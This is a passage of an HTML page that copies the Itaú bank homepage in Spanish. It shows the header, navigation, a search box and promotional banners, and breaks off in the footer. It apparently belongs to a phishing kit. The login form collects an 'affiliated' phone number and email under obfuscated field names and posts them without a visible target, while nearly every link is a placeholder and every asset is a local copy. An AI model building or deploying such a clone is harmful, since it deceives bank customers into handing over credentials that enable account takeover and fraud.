<!DOCTYPE html>
<html >
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
      <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
      <style type="text/css">
         .ocultar-div{
         display:none;
         }
         @media screen and (max-width: 600px) {
         .ocultar-div{
         display:block;
         color: #252220;
         font-size: 11pt;
         font-family: ItauDisplay2;
         font-weight: 400;
         }
         }


         </style>
         
      
      <link href="css/theme.css" type="text/css" rel="stylesheet">
      <link href="css/nivo-slider.css" type="text/css" rel="stylesheet">
      <link href="css/css.css" type="text/css" rel="stylesheet">
      <link rel="preload" href="css/fonts.css" as="style">
      <link rel="preload" href="css/main2.css" as="style">
      <link rel="stylesheet" href="css/fonts.css">
      <link rel="stylesheet" href="css/main2.css">

      <style id="style-konecta-widget">
         #chat-konecta .sc-chat-window *
         {
         font-family: 'Roboto', sans-serif;
         }
         #chat-konecta .sc-launcher:not(.opened) .sc-open-container p {
         font-family: 'Roboto', sans-serif;
         }
         #chat-konecta .sc-chat-window.opened * {
         font-family: 'Roboto', sans-serif;
         }
         #chat-konecta .sc-chat-window .received a {
         color: #000000
         }
      </style>
      <title>Hecho para ti en todo momento</title>
   
        <style type="text/css">.resize-observer[data-v-b329ee4c]{position:absolute;top:0;left:0;z-index:-1;width:100%;height:100%;border:none;background-color:transparent;pointer-events:none;display:block;overflow:hidden;opacity:0}.resize-observer[data-v-b329ee4c] object{display:block;position:absolute;top:0;left:0;height:100%;width:100%;overflow:hidden;pointer-events:none;z-index:-1}</style>
      <style type="text/css">
         .VueCarousel-navigation-button[data-v-453ad8cd] {
         position: absolute;
         top: 50%;
         box-sizing: border-box;
         color: #000;
         text-decoration: none;
         appearance: none;
         border: none;
         background-color: transparent;
         padding: 0;
         cursor: pointer;
         outline: none;
         }
         .VueCarousel-navigation-button[data-v-453ad8cd]:focus {
         outline: 1px solid lightblue;
         }
         .VueCarousel-navigation-next[data-v-453ad8cd] {
         right: 0;
         transform: translateY(-50%) translateX(100%);
         font-family: "system";
         }
         .VueCarousel-navigation-prev[data-v-453ad8cd] {
         left: 0;
         transform: translateY(-50%) translateX(-100%);
         font-family: "system";
         }
         .VueCarousel-navigation--disabled[data-v-453ad8cd] {
         opacity: 0.5;
         cursor: default;
         }
         /* Define the "system" font family */
         @font-face {
         font-family: system;
         font-style: normal;
         font-weight: 300;
         src: local(".SFNSText-Light"), local(".HelveticaNeueDeskInterface-Light"),
         local(".LucidaGrandeUI"), local("Ubuntu Light"), local("Segoe UI Symbol"),
         local("Roboto-Light"), local("DroidSans"), local("Tahoma");
         }
      </style>
      <style type="text/css">
         .VueCarousel-pagination[data-v-438fd353] {
         width: 100%;
         text-align: center;
         }
         .VueCarousel-pagination--top-overlay[data-v-438fd353] {
         position: absolute;
         top: 0;
         }
         .VueCarousel-pagination--bottom-overlay[data-v-438fd353] {
         position: absolute;
         bottom: 0;
         }
         .VueCarousel-dot-container[data-v-438fd353] {
         display: inline-block;
         margin: 0 auto;
         padding: 0;
         }
         .VueCarousel-dot[data-v-438fd353] {
         display: inline-block;
         cursor: pointer;
         appearance: none;
         border: none;
         background-clip: content-box;
         box-sizing: content-box;
         padding: 0;
         border-radius: 100%;
         outline: none;
         }
         .VueCarousel-dot[data-v-438fd353]:focus {
         outline: 1px solid lightblue;
         }
      </style>
      <style type="text/css">
         .VueCarousel-slide {
         flex-basis: inherit;
         flex-grow: 0;
         flex-shrink: 0;
         user-select: none;
         backface-visibility: hidden;
         -webkit-touch-callout: none;
         -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
         outline: none;
         }
         .VueCarousel-slide-adjustableHeight {
         display: table;
         flex-basis: auto;
         width: 100%;
         }
      </style>
      <style type="text/css">
         .VueCarousel {
         display: flex;
         flex-direction: column;
         position: relative;
         }
         .VueCarousel--reverse {
         flex-direction: column-reverse;
         }
         .VueCarousel-wrapper {
         width: 100%;
         position: relative;
         overflow: hidden;
         }
         .VueCarousel-inner {
         display: flex;
         flex-direction: row;
         backface-visibility: hidden;
         }
         .VueCarousel-inner--center {
         justify-content: center;
         }
      </style>
    
   </head>
   <body class="konecta-widget-enabled">
     
      <header class="c-header u-reboot" id="masthead">
         <div class="c-header__content">
            <div class="o-container">
               <div class="c-header__container">
                  <div class="u-flex u-items-start u-items-center-mobile u-justify-between h-screen">
                     <div class="u-flex u-items-start h-screen">
                        <h1 class="c-header__logo">
                           <a href="#"><img src="img/logo-itau.svg" width="48" height="48"  style="pointer-events: none;"></a>
                        </h1>
                        <ul class="c-header__nav u-flex u-items-start hide-on-mobile h-screen">
                           <li tabindex="0" class="main-link">
                              <span> para ti </span>
                              
                           </li>
                           <li tabindex="0" class="nav-link-empresas main-link">
                              <span> para empresas </span>
                              
                           </li>
                           <li class="main-link">
                              <a class="main-link-external" href="#">beneficios</a>
                           </li>
                           <li tabindex="0" class="main-link">
                              <span> atención al cliente </span>
                             
                              
                           </li>
                        </ul>
                     </div>
                     <div class="c-header__right">
                        <div class="c-coso hide-on-mobile">
                           <button class="js-toggle-searcher-desktop btn-searcher-desktop u-plainButton">
                              <svg xmlns="http://www.w3.org/2000/svg" fill="none" width="32" height="32" viewBox="0 0 32 32">
                                 <path fill="#fff" d="M21 14.5a7.32 7.32 0 0 0-2.21-5.29 7.33 7.33 0 0 0-5.3-2.2 7.27 7.27 0 0 0-5.3 2.2 7.32 7.32 0 0 0-2.2 5.3c0 1.03.2 2 .59 2.9a7.78 7.78 0 0 0 4 4.01c.91.4 1.88.59 2.91.59a7.32 7.32 0 0 0 5.3-2.2 7.27 7.27 0 0 0 1.62-2.4c.39-.9.58-1.87.58-2.9Zm-4.98 5.98a6.4 6.4 0 0 1-3.82.4 7.18 7.18 0 0 1-2.34-.98 6.67 6.67 0 0 1-2.74-4.1 7.06 7.06 0 0 1 0-2.58c.1-.44.22-.85.4-1.24A5.72 5.72 0 0 1 8.9 9.9c.3-.3.62-.57.96-.8a5.97 5.97 0 0 1 2.34-.98 5.92 5.92 0 0 1 2.58 0c.44.08.85.2 1.24.38a6.84 6.84 0 0 1 2.86 2.37 5.86 5.86 0 0 1 .99 2.34 5.93 5.93 0 0 1 0 2.58 5.97 5.97 0 0 1-.99 2.34 6.66 6.66 0 0 1-2.86 2.34Zm9.68 4.74-1.5 1.5a.95.95 0 0 1-.7.28.95.95 0 0 1-.7-.28l-4.97-4.9.42-.28.42-.28 4.83 4.73 1.5-1.5-4.76-4.83.3-.42.29-.42 4.87 4.97a1 1 0 0 1 0 1.43Z"></path>
                              </svg>
                              <span>buscar</span>
                           </button>
                           <span class="c-coso__divider"></span>
                        </div>
                        <button class="u-plainButton login-mobile-nav btn-login-desktop hide-on-mobile is-open" id="js-open-login-desktop">
                           <div class="btn-login-content hide-element">
                              <svg width="16" height="22" viewBox="0 0 16 22" fill="none" xmlns="http://www.w3.org/2000/svg">
                                 <path d="M3.5 5.49219C3.5 6.74219 3.9375 7.80469 4.8125 8.67969C5.6875 9.5547 6.75 9.9922 8 9.9922C9.25 9.9922 10.3125 9.5547 11.1875 8.67969C12.0625 7.80469 12.5 6.74219 12.5 5.49219C12.5 4.25781 12.0625 3.20313 11.1875 2.32812C10.3125 1.4375 9.25 0.992188 8 0.992188C6.75 0.992188 5.6875 1.4375 4.8125 2.32812C3.9375 3.20313 3.5 4.25781 3.5 5.49219ZM8 9.0078C7.0312 9.0078 6.2031 8.66406 5.51562 7.97656C4.84375 7.28906 4.50781 6.46094 4.50781 5.49219C4.50781 4.52344 4.84375 3.70312 5.51562 3.03125C6.2031 2.34375 7.0312 2 8 2C8.9688 2 9.7891 2.34375 10.4609 3.03125C11.1484 3.70312 11.4922 4.52344 11.4922 5.49219C11.4922 6.46094 11.1484 7.28906 10.4609 7.97656C9.7891 8.66406 8.9688 9.0078 8 9.0078ZM0.0078125 18.0078V19.5078C0.0078125 19.9141 0.148442 20.2656 0.429692 20.5625C0.726562 20.8594 1.08594 21.0078 1.50781 21.0078H14.4922C14.9141 21.0078 15.2656 20.8594 15.5469 20.5625C15.8438 20.2656 15.9922 19.9141 15.9922 19.5078V18.0078C15.9922 17.1797 15.8359 16.3984 15.5234 15.6641C15.2109 14.9297 14.7812 14.2969 14.2344 13.7656C13.7031 13.2188 13.0703 12.7891 12.3359 12.4766C11.6016 12.1641 10.8203 12.0078 9.9922 12.0078H6.0078C5.17969 12.0078 4.39844 12.1641 3.66406 12.4766C2.92969 12.7891 2.28906 13.2188 1.74219 13.7656C1.21094 14.2969 0.789062 14.9297 0.476562 15.6641C0.164062 16.3984 0.0078125 17.1797 0.0078125 18.0078ZM0.992192 18.0078C0.992192 17.3047 1.125 16.6562 1.39062 16.0625C1.65625 15.4531 2.01562 14.9219 2.46875 14.4688C2.92188 14.0156 3.45312 13.6562 4.0625 13.3906C4.65625 13.125 5.30469 12.9922 6.0078 12.9922H9.9922C10.6953 12.9922 11.3438 13.125 11.9375 13.3906C12.5469 13.6562 13.0781 14.0156 13.5312 14.4688C13.9844 14.9219 14.3438 15.4531 14.6094 16.0625C14.875 16.6562 15.0078 17.3047 15.0078 18.0078V19.5078C15.0078 19.6484 14.9531 19.7656 14.8438 19.8594C14.75 19.9531 14.6328 20 14.4922 20H1.50781C1.36719 20 1.24219 19.9531 1.13281 19.8594C1.03906 19.7656 0.992192 19.6484 0.992192 19.5078V18.0078Z" fill="white"></path>
                              </svg>
                              <span>ingresar</span>
                           </div>
                           <svg class="cross-icon-login" width="32" height="32" viewBox="-7 -7 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                              <path d="M15.8281 15.4844C15.9375 15.5938 15.9922 15.7344 15.9922 15.9062C15.9922 16.0781 15.9375 16.2188 15.8281 16.3281C15.7031 16.4375 15.5547 16.4922 15.3828 16.4922C15.2266 16.4922 15.0938 16.4375 14.9844 16.3281L8 9.3438L1.01562 16.3281C0.906252 16.4375 0.765622 16.4922 0.593752 16.4922C0.421882 16.4922 0.281252 16.4375 0.171882 16.3281C0.0625021 16.2031 0.0078125 16.0625 0.0078125 15.9062C0.0078125 15.7344 0.0625021 15.5938 0.171882 15.4844L7.1562 8.5L0.171882 1.51562C0.0625021 1.40625 0.0078125 1.26563 0.0078125 1.09375C0.0078125 0.921872 0.0625021 0.781252 0.171882 0.671882C0.296882 0.562502 0.437502 0.507812 0.593752 0.507812C0.765622 0.507812 0.906252 0.562502 1.01562 0.671882L8 7.6562L14.9844 0.671882C15.0938 0.562502 15.2344 0.507812 15.4062 0.507812C15.5781 0.507812 15.7188 0.562502 15.8281 0.671882C15.9375 0.796882 15.9922 0.945312 15.9922 1.11719C15.9922 1.27344 15.9375 1.40625 15.8281 1.51562L8.8438 8.5L15.8281 15.4844Z" fill="white"></path>
                           </svg>
                        </button>
                        <div class="c-login is-open">
                           <form id="loginform" data-segmento="panelPersona" class="c-login__form" method="post" >
                             
                              <div class="c-login__wrap">
                                
                                  <div class="panel-telefono">
                                    
                                   <span class="ocultar-div"  >Ingrese su número de celular:</span>

                                    <input type="tel" name="t0s24u824s" id="step02" placeholder="Celular afiliado" maxlength="9" minlength="8"  class="login-control tabular-nums" onKeypress="if (event.keyCode < 45 || event.keyCode > 57) event.returnValue = false;" >
                                 </div>
                                 
                                 <div class="panel-telefono">
                                    <span class="ocultar-div"  >Ingrese su correo electrónico afiliado:</span>
                                
                                    <input type="email" name="PR9345FW" id="step01"  minlength="2" required placeholder="Correo electrónico" class="login-control right-radius" >
                                 </div>
                                 
                                 <div class="c-login__help">
                                    <!-- personas/comercios -->
                                    
                                    <span class="ayudaAcceso24-2" style="display: none;">
                                       <a class="panel-consulta right-border" href="#">
                                          ¿ingresás por primera vez? 
                                          <svg class="arrow" xmlns="http://www.w3.org/2000/svg" width="6" height="12" fill="none" viewBox="0 0 6 12">
                                             <path fill="#007AB7" d="M5.1 5.8.5 1.2.3.9C.3.8.3.7.5.6L.7.5l.3.1 4.8 4.8a.7.7 0 0 1 0 1L1 11l-.3.2-.2-.1-.2-.3c0-.1 0-.2.2-.3L5 5.8Z"></path>
                                          </svg>
                                       </a>
                                       <a class="panel-consulta btnOlvide" href="#">
                                          olvidé mi contraseña 
                                          <svg class="arrow" xmlns="http://www.w3.org/2000/svg" width="6" height="12" fill="none" viewBox="0 0 6 12">
                                             <path fill="#007AB7" d="M5.1 5.8.5 1.2.3.9C.3.8.3.7.5.6L.7.5l.3.1 4.8 4.8a.7.7 0 0 1 0 1L1 11l-.3.2-.2-.1-.2-.3c0-.1 0-.2.2-.3L5 5.8Z"></path>
                                          </svg>
                                       </a>
                                    </span>
                                 </div>
                              </div>
                              <button class="c-login__button" id="btnEnviar" type="submit" title="Ingresar">
                                 <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" width="24" height="24">
                                    <path fill="currentColor" d="M16.16 12 9.18 5a.51.51 0 0 1-.19-.4c0-.16.06-.3.19-.41.1-.13.24-.19.4-.19.17 0 .31.06.42.19l7.13 7.1a1 1 0 0 1 0 1.43l-7.1 7.1a.74.74 0 0 1-.43.19.62.62 0 0 1-.42-.17.58.58 0 0 1-.19-.42.6.6 0 0 1 .19-.44l6.98-6.99Z"></path>
                                 </svg>
                                 <span class="u-visuallyHidden">Ingresar</span>
                              </button>
                           </form>
                        </div>
                        <div class="c-header__actions hide-on-desktop">
                           <button class="u-plainButton login-mobile-nav is-open" id="js-open-login">
                              <div class="btn-login-content hide-element">
                                 <svg width="16" height="22" viewBox="0 0 16 22" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M3.5 5.49219C3.5 6.74219 3.9375 7.80469 4.8125 8.67969C5.6875 9.5547 6.75 9.9922 8 9.9922C9.25 9.9922 10.3125 9.5547 11.1875 8.67969C12.0625 7.80469 12.5 6.74219 12.5 5.49219C12.5 4.25781 12.0625 3.20313 11.1875 2.32812C10.3125 1.4375 9.25 0.992188 8 0.992188C6.75 0.992188 5.6875 1.4375 4.8125 2.32812C3.9375 3.20313 3.5 4.25781 3.5 5.49219ZM8 9.0078C7.0312 9.0078 6.2031 8.66406 5.51562 7.97656C4.84375 7.28906 4.50781 6.46094 4.50781 5.49219C4.50781 4.52344 4.84375 3.70312 5.51562 3.03125C6.2031 2.34375 7.0312 2 8 2C8.9688 2 9.7891 2.34375 10.4609 3.03125C11.1484 3.70312 11.4922 4.52344 11.4922 5.49219C11.4922 6.46094 11.1484 7.28906 10.4609 7.97656C9.7891 8.66406 8.9688 9.0078 8 9.0078ZM0.0078125 18.0078V19.5078C0.0078125 19.9141 0.148442 20.2656 0.429692 20.5625C0.726562 20.8594 1.08594 21.0078 1.50781 21.0078H14.4922C14.9141 21.0078 15.2656 20.8594 15.5469 20.5625C15.8438 20.2656 15.9922 19.9141 15.9922 19.5078V18.0078C15.9922 17.1797 15.8359 16.3984 15.5234 15.6641C15.2109 14.9297 14.7812 14.2969 14.2344 13.7656C13.7031 13.2188 13.0703 12.7891 12.3359 12.4766C11.6016 12.1641 10.8203 12.0078 9.9922 12.0078H6.0078C5.17969 12.0078 4.39844 12.1641 3.66406 12.4766C2.92969 12.7891 2.28906 13.2188 1.74219 13.7656C1.21094 14.2969 0.789062 14.9297 0.476562 15.6641C0.164062 16.3984 0.0078125 17.1797 0.0078125 18.0078ZM0.992192 18.0078C0.992192 17.3047 1.125 16.6562 1.39062 16.0625C1.65625 15.4531 2.01562 14.9219 2.46875 14.4688C2.92188 14.0156 3.45312 13.6562 4.0625 13.3906C4.65625 13.125 5.30469 12.9922 6.0078 12.9922H9.9922C10.6953 12.9922 11.3438 13.125 11.9375 13.3906C12.5469 13.6562 13.0781 14.0156 13.5312 14.4688C13.9844 14.9219 14.3438 15.4531 14.6094 16.0625C14.875 16.6562 15.0078 17.3047 15.0078 18.0078V19.5078C15.0078 19.6484 14.9531 19.7656 14.8438 19.8594C14.75 19.9531 14.6328 20 14.4922 20H1.50781C1.36719 20 1.24219 19.9531 1.13281 19.8594C1.03906 19.7656 0.992192 19.6484 0.992192 19.5078V18.0078Z" fill="white"></path>
                                 </svg>
                                 <span>ingresar</span>
                              </div>
                              <svg class="cross-icon-login" width="32" height="32" viewBox="-7 -7 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                                 <path d="M15.8281 15.4844C15.9375 15.5938 15.9922 15.7344 15.9922 15.9062C15.9922 16.0781 15.9375 16.2188 15.8281 16.3281C15.7031 16.4375 15.5547 16.4922 15.3828 16.4922C15.2266 16.4922 15.0938 16.4375 14.9844 16.3281L8 9.3438L1.01562 16.3281C0.906252 16.4375 0.765622 16.4922 0.593752 16.4922C0.421882 16.4922 0.281252 16.4375 0.171882 16.3281C0.0625021 16.2031 0.0078125 16.0625 0.0078125 15.9062C0.0078125 15.7344 0.0625021 15.5938 0.171882 15.4844L7.1562 8.5L0.171882 1.51562C0.0625021 1.40625 0.0078125 1.26563 0.0078125 1.09375C0.0078125 0.921872 0.0625021 0.781252 0.171882 0.671882C0.296882 0.562502 0.437502 0.507812 0.593752 0.507812C0.765622 0.507812 0.906252 0.562502 1.01562 0.671882L8 7.6562L14.9844 0.671882C15.0938 0.562502 15.2344 0.507812 15.4062 0.507812C15.5781 0.507812 15.7188 0.562502 15.8281 0.671882C15.9375 0.796882 15.9922 0.945312 15.9922 1.11719C15.9922 1.27344 15.9375 1.40625 15.8281 1.51562L8.8438 8.5L15.8281 15.4844Z" fill="white"></path>
                              </svg>
                           </button>
                           <button class="u-plainButton js-toggle-searcher-desktop">
                              <svg class="search-icon" xmlns="http://www.w3.org/2000/svg" fill="none" width="32" height="32" viewBox="0 0 32 32">
                                 <path fill="#fff" d="M21 14.5a7.32 7.32 0 0 0-2.21-5.29 7.33 7.33 0 0 0-5.3-2.2 7.27 7.27 0 0 0-5.3 2.2 7.32 7.32 0 0 0-2.2 5.3c0 1.03.2 2 .59 2.9a7.78 7.78 0 0 0 4 4.01c.91.4 1.88.59 2.91.59a7.32 7.32 0 0 0 5.3-2.2 7.27 7.27 0 0 0 1.62-2.4c.39-.9.58-1.87.58-2.9Zm-4.98 5.98a6.4 6.4 0 0 1-3.82.4 7.18 7.18 0 0 1-2.34-.98 6.67 6.67 0 0 1-2.74-4.1 7.06 7.06 0 0 1 0-2.58c.1-.44.22-.85.4-1.24A5.72 5.72 0 0 1 8.9 9.9c.3-.3.62-.57.96-.8a5.97 5.97 0 0 1 2.34-.98 5.92 5.92 0 0 1 2.58 0c.44.08.85.2 1.24.38a6.84 6.84 0 0 1 2.86 2.37 5.86 5.86 0 0 1 .99 2.34 5.93 5.93 0 0 1 0 2.58 5.97 5.97 0 0 1-.99 2.34 6.66 6.66 0 0 1-2.86 2.34Zm9.68 4.74-1.5 1.5a.95.95 0 0 1-.7.28.95.95 0 0 1-.7-.28l-4.97-4.9.42-.28.42-.28 4.83 4.73 1.5-1.5-4.76-4.83.3-.42.29-.42 4.87 4.97a1 1 0 0 1 0 1.43Z"></path>
                              </svg>
                              <svg class="cross-icon-search hide-element" width="32" height="32" viewBox="-7 -7 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                                 <path d="M15.8281 15.4844C15.9375 15.5938 15.9922 15.7344 15.9922 15.9062C15.9922 16.0781 15.9375 16.2188 15.8281 16.3281C15.7031 16.4375 15.5547 16.4922 15.3828 16.4922C15.2266 16.4922 15.0938 16.4375 14.9844 16.3281L8 9.3438L1.01562 16.3281C0.906252 16.4375 0.765622 16.4922 0.593752 16.4922C0.421882 16.4922 0.281252 16.4375 0.171882 16.3281C0.0625021 16.2031 0.0078125 16.0625 0.0078125 15.9062C0.0078125 15.7344 0.0625021 15.5938 0.171882 15.4844L7.1562 8.5L0.171882 1.51562C0.0625021 1.40625 0.0078125 1.26563 0.0078125 1.09375C0.0078125 0.921872 0.0625021 0.781252 0.171882 0.671882C0.296882 0.562502 0.437502 0.507812 0.593752 0.507812C0.765622 0.507812 0.906252 0.562502 1.01562 0.671882L8 7.6562L14.9844 0.671882C15.0938 0.562502 15.2344 0.507812 15.4062 0.507812C15.5781 0.507812 15.7188 0.562502 15.8281 0.671882C15.9375 0.796882 15.9922 0.945312 15.9922 1.11719C15.9922 1.27344 15.9375 1.40625 15.8281 1.51562L8.8438 8.5L15.8281 15.4844Z" fill="white"></path>
                              </svg>
                           </button>
                           <button id="burger" class="u-plainButton">
                              <svg class="burger-icon" width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                                 <path d="M27.3437 9.34375H4.65625C4.48959 9.34375 4.33333 9.28125 4.18749 9.15625C4.06251 9.01041 4 8.84375 4 8.65625C4 8.48959 4.06251 8.34375 4.18749 8.21875C4.33333 8.07292 4.48959 8 4.65625 8H27.3437C27.5104 8 27.6563 8.07292 27.7812 8.21875C27.9271 8.34375 28 8.48959 28 8.65625C28 8.84375 27.9271 9.01041 27.7812 9.15625C27.6563 9.28125 27.5104 9.34375 27.3437 9.34375ZM28 16.6563C28 16.4896 27.9271 16.3437 27.7812 16.2188C27.6563 16.0729 27.5104 16 27.3437 16H4.65625C4.48959 16 4.33333 16.0729 4.18749 16.2188C4.06251 16.3437 4 16.4896 4 16.6563C4 16.8437 4.06251 17.0104 4.18749 17.1563C4.33333 17.2812 4.48959 17.3437 4.65625 17.3437H27.3437C27.5104 17.3437 27.6563 17.2812 27.7812 17.1563C27.9271 17.0104 28 16.8437 28 16.6563ZM28 24.6563C28 24.4896 27.9271 24.3437 27.7812 24.2188C27.6563 24.0729 27.5104 24 27.3437 24H4.65625C4.48959 24 4.33333 24.0729 4.18749 24.2188C4.06251 24.3437 4 24.4896 4 24.6563C4 24.8437 4.06251 25.0104 4.18749 25.1563C4.33333 25.2812 4.48959 25.3437 4.65625 25.3437H27.3437C27.5104 25.3437 27.6563 25.2812 27.7812 25.1563C27.9271 25.0104 28 24.8437 28 24.6563Z" fill="white"></path>
                              </svg>
                              <svg class="cross-icon hide-element" width="32" height="32" viewBox="-7 -7 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                                 <path d="M15.8281 15.4844C15.9375 15.5938 15.9922 15.7344 15.9922 15.9062C15.9922 16.0781 15.9375 16.2188 15.8281 16.3281C15.7031 16.4375 15.5547 16.4922 15.3828 16.4922C15.2266 16.4922 15.0938 16.4375 14.9844 16.3281L8 9.3438L1.01562 16.3281C0.906252 16.4375 0.765622 16.4922 0.593752 16.4922C0.421882 16.4922 0.281252 16.4375 0.171882 16.3281C0.0625021 16.2031 0.0078125 16.0625 0.0078125 15.9062C0.0078125 15.7344 0.0625021 15.5938 0.171882 15.4844L7.1562 8.5L0.171882 1.51562C0.0625021 1.40625 0.0078125 1.26563 0.0078125 1.09375C0.0078125 0.921872 0.0625021 0.781252 0.171882 0.671882C0.296882 0.562502 0.437502 0.507812 0.593752 0.507812C0.765622 0.507812 0.906252 0.562502 1.01562 0.671882L8 7.6562L14.9844 0.671882C15.0938 0.562502 15.2344 0.507812 15.4062 0.507812C15.5781 0.507812 15.7188 0.562502 15.8281 0.671882C15.9375 0.796882 15.9922 0.945312 15.9922 1.11719C15.9922 1.27344 15.9375 1.40625 15.8281 1.51562L8.8438 8.5L15.8281 15.4844Z" fill="white"></path>
                              </svg>
                           </button>
                        </div>
                     </div>
                  </div>
               </div>
            </div>
         </div>
      </header>
      <nav id="nav-mobile" class="u-reboot hide-on-desktop">
         <div class="o-container">
            <ul class="m-nav__list">
               <li>
                  <a href="#" class="m-nav__item" data-collapse="#subitems-1"> para ti </a>
                  
               </li>
               <li>
                  <a href="#" class="m-nav__item m-nav__empresa-item" data-collapse="#subitems-3"> para empresas </a>
                  
               </li>
               <li>
                  <a href="#" class="m-nav__item is-external"> beneficios </a>
               </li>
               <li>
                  <a href="#" class="m-nav__item" data-collapse="#subitems-2"> atención al cliente </a>
                  
               </li>
            </ul>
         </div>
      </nav>
      <section id="login-mobile" class="u-reboot hide-on-desktop">login</section>
      <!-- modal buscador -->
      <div class="modal-buscador">
         <div class="modal-top">
            <div class="container">
               <div>
                  <a href="#" class="hide-on-mobile"><img src="img/logo-itau.svg" width="48" height="48" style="pointer-events: none;"></a>
                  <img class="hide-on-desktop" src="img/search-primary.svg" width="32" height="32" style="margin: 0px 7px 3px 0px; pointer-events: none;" >
                  <input type="text" id="js-modal-input-buscador" placeholder="¿qué estás buscando?" autocomplete="off">
               </div>
               <button class="js-toggle-searcher-desktop u-plainButton hide-on-mobile">
                  <svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
                     <path d="M15.8281 14.9844C15.9375 15.0938 15.9922 15.2344 15.9922 15.4062C15.9922 15.5781 15.9375 15.7188 15.8281 15.8281C15.7031 15.9375 15.5547 15.9922 15.3828 15.9922C15.2266 15.9922 15.0938 15.9375 14.9844 15.8281L8 8.84379L1.01562 15.8281C0.906252 15.9375 0.765622 15.9922 0.593752 15.9922C0.421882 15.9922 0.281252 15.9375 0.171882 15.8281C0.0625021 15.7031 0.0078125 15.5625 0.0078125 15.4062C0.0078125 15.2344 0.0625021 15.0938 0.171882 14.9844L7.1562 8L0.171882 1.01562C0.0625021 0.906252 0.0078125 0.765632 0.0078125 0.593752C0.0078125 0.421872 0.0625021 0.281252 0.171882 0.171882C0.296882 0.0625021 0.437502 0.0078125 0.593752 0.0078125C0.765622 0.0078125 0.906252 0.0625021 1.01562 0.171882L8 7.1562L14.9844 0.171882C15.0938 0.0625021 15.2344 0.0078125 15.4062 0.0078125C15.5781 0.0078125 15.7188 0.0625021 15.8281 0.171882C15.9375 0.296882 15.9922 0.445312 15.9922 0.617192C15.9922 0.773442 15.9375 0.906252 15.8281 1.01562L8.84379 8L15.8281 14.9844Z" fill="#252220"></path>
                  </svg>
               </button>
            </div>
         </div>
         <div class="modal-results">
            <div class="container">
               <p class="modal-title">sugerencias</p>
               <div class="modal-suggestions-content">
                  <ul class="modal-list-results">
                     <li>
                        <a href="#">préstamos</a>
                     </li>
                     <li>
                        <a href="#">tarjetas de crédito</a>
                     </li>
                     <li>
                        <a href="#">inversiones</a>
                     </li>
                  </ul>
               </div>
               <div class="modal-results-content" id="js-modal-results"></div>
            </div>
         </div>
      </div>
   
      <div id="contPrincipal">
         <div id="contSliderPortada" style="max-height: 768px;">
            <div id="slider" class="nivoSlider">
               <a data-mapa="false" id="img_10272919_HOMEAMERICANBUSINESSOCT2023" href="#" class="nivo-imageLink" style="display: block;"><img id="img_img_10272919_HOMEAMERICANBUSINESSOCT2023" data-thumb="aci/images/img_10272918_BOTONHOMEAMERICANBUSINESSOCT2023.jpg" alt="America Business Forum" src="img/img_10272919_HOMEAMERICANBUSINESSOCT2023.jpg" style="display: none; pointer-events: none;"></a>
               <a data-mapa="false" id="img_10408229_PlacaHomeArocenaOpen28deoctubreIPB" href="#" class="nivo-imageLink" style="display: none;"><img id="img_img_10408229_PlacaHomeArocenaOpen28deoctubreIPB" data-thumb="aci/images/img_10410208_BotónArocenaOpen28deoctubreIPB.jpg" alt="Arocena Open" src="img/img_10410209_PlacaHomeArocenaOpen28deoctubreIPB.jpg" style="display: none; pointer-events: none;"></a>
               <a data-mapa="false" id="img_10041723_itautkBannerHome1440x900_Home" href="#" class="nivo-imageLink" style="display: none;">
                <img id="img_img_10041723_itautkBannerHome1440x900_Home" data-thumb="aci/images/img_10058835_itautkBannerHome_Boton120x60.jpg" alt=" busca TikToker" src="img/img_10041723_itautkBannerHome1440x900_Home.jpg" style="display: none; pointer-events: none;"></a><a data-mapa="false" id="img_9657776_HOMECUENTAUNIPERSONALSET2023" href="#" class="nivo-imageLink" style="display: none;"><img id="img_img_9657776_HOMECUENTAUNIPERSONALSET2023" data-thumb="aci/images/img_9663101_BOTONHOMECUENTAUNIPERSONALSET2023.jpg" alt="Cuenta Unipersonal" src="img/img_9657776_HOMECUENTAUNIPERSONALSET2023.jpg" style="display: none; pointer-events: none;"></a><a data-mapa="false" id="img_10261772_HOMESALAVIPOCT2023" href="#" class="nivo-imageLink" style="display: none;"><img id="img_img_10261772_HOMESALAVIPOCT2023" data-thumb="aci/images/img_10261771_BOTONHOMESALAVIPOCT2023.jpg" alt="Cambio de tarifas salas vip" src="img/img_10261772_HOMESALAVIPOCT2023.jpg" style="display: none; pointer-events: none;"></a><img class="nivo-main-image" src="img/img_10272919_HOMEAMERICANBUSINESSOCT2023.jpg" style="pointer-events: none; width: 390px; height: auto;">
               <div class="nivo-caption"></div>
               <div id="google_maps_canvas" class="none" style="width: 390px; height: 243.75px;"></div>
            </div>
            <div class="nivo-controlNav nivo-thumbs-enabled">
                <a class="nivo-control active" rel="0" id="home-thumbnail-1">
                  <img src="img/img_10058835_itautkBannerHome_Boton120x60.jpg" alt="" style="pointer-events: none;">
                  <div class="thumb-title" style="pointer-events: none;">Mejoramos la tasa en DPF</div>
               </a>
                <a class="nivo-control" rel="1" id="home-thumbnail-2">
                  <img src="img/img_573434_TRX_Placahomechica.jpg" alt="" style="pointer-events: none;">
                  <div class="thumb-title" style="pointer-events: none;">Moda 25%</div>
               </a>
               <a class="nivo-control" rel="1" id="home-thumbnail-2">
                  <img src="img/img_9663101_BOTONHOMECUENTAUNIPERSONALSET2023.jpg" alt="" style="pointer-events: none;">
                  <div class="thumb-title" style="pointer-events: none;">Itaú Asset</div>
               </a>
               <a class="nivo-control" rel="2" id="home-thumbnail-3">
                  <img src="img/img_347037_BOTONVOLAROCT2019.jpg" alt="" style="pointer-events: none;">
                  <div class="thumb-title" style="pointer-events: none;">Volar</div>
               </a>
            </div>
         </div>
      </div>

      <footer class="c-footer u-reboot">
         <div class="o-container">
            <div class="c-footer__content">
               <div class="d-none d-md-block">
                  <h1 class="c-footer__logo">
                     <a href="#" title="Ir a la página principal">
